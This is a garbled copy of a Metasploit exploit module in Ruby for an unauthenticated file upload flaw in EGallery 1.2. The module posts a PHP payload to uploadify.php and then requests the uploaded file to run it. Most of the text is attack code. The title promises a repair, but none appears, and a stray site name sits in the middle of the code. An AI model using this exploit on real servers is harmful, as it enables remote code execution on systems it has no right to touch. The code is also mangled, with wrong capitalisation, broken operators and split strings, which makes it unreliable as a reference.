EGallery PHP File Upload defect and repair

##
# This file is part of the Metasploit Framework and may be subject
# Redistribution and specified cial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# Http://metasploit.com/framework/
##
 
Require 'msf/core'
 
Class Metasploit3 <Msf: Exploit: Remote
Rank = ExcellentRanking
 
Include Msf: Exploit: Remote: HttpClient
 
Def initialize (info = {})
Super (update_info (info,
'Name' => "EGallery PHP File Upload Vulnerability ",
'Description' => % q {
This module exploits a vulnerability found in EGallery 1.2 By abusing
Uploadify. php file, a malicious user can upload a file to the egallery/directory
Without any authentication, which results in arbitrary code execution. The module
Has been tested successfully on Ubuntu 10.04.
},
'License '=> MSF_LICENSE,
'Author' =>
[
'Sammy FORGIT ', # Discovery, PoC
'Juanc' # Metasploit module
],
'References '=>
[
['Ossvdb', '123'],
['Bid', '123'],
['Url', 'HTTP: // www. opensyscom. fr/Actualites/egallery-arbitrary-file-upload-vulnerability.html ']
],
'Payload' =>
{
'Badchars' => "\ x00"
},
'Defaultopexception' =>
{
'Exitfunction' => "none"
},
'Platform' => ['php'],
'Arch '=> ARCH_PHP,
'Targets' =>
[
['Egallery 1.2 ', {}]
],
'Privileged' => false,
'Disclosuredate' => "Jul 08 2012 ",
'Defaulttarget' => 0 ))
 
Register_options (
[
OptString. new ('targeturi ', [true, 'the base path to EGallery', '/sample'])
], Self. class)
End
 
Def check
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
 
Res = send_request_cgi ({
'Method' => 'get ',
'Url' => "# {uri} egallery/uploadify. php"
})
 
If res and res. code = 200 and res. body. empty?
Return Exploit: CheckCode: Detected
Else
Return Exploit: CheckCode: Safe
End
End
Www.2cto.com
Def exploit
Uri = target_uri.path
Uri <'/' if uri [-1, 1]! = '/'
 
Peer = "# {rhost }:# {rport }"
Payload_name = rand_text_alpha (rand (10) + 5) + '. php'
Boundary = Rex: Text. rand_text_hex (7)
 
Post_data = "-- # {boundary} \ r \ n"
Post_data <"Content-Disposition: form-data; name = \" Filename \ "\ r \ n"
Post_data <"# {payload_name} \ r \ n"
Post_data <"-- # {boundary} \ r \ n"
Post_data <"Content-Disposition: form-data; name = \" folder \ "\ r \ n"
Post_data <"# {uri} \ r \ n"
Post_data <"-- # {boundary} \ r \ n"
Post_data <"Content-Disposition: form-data; name = \" Filedata \ "; filename = \" # {payload_name} \ "\ r \ n"
Post_data <"<? Php"
Post_data <payload. encoded
Post_data <"?> \ R \ n"
Post_data <"-- # {boundary} -- \ r \ n"
 
Print_status ("# {peer}-Sending PHP payload (# {payload_name })")
Res = send_request_cgi ({
'Method' => 'post ',
'Url' => "# {uri} egallery/uploadify. php ",
'Ctype '=> "multipart/form-data; boundary =#{ boundary }",
'Data' => post_data
})
 
# If the server returns 200 and the body contains our payload name,
# We assume we uploaded the malicious file successfully
If not res or res. code! = 200 or res. body !~ /# {Payload_name }/
Print_error ("# {peer}-File wasn't uploaded, aborting! ")
Return
End
 
Print_status ("# {peer}-Executing PHP payload (# {payload_name })")
# Execute our payload
Res = send_request_cgi ({
'Method' => 'get ',
'Url' => "# {uri} # {payload_name }"
})
 
# If we don't get a 200 when we request our malicious payload, we suspect
# We don't have a shell, either. Print the status code for debugging purposes.
If res and res. code! = 200
Print_status ("# {peer}-Server returned # {res. code. to_s }")
End
End
 
End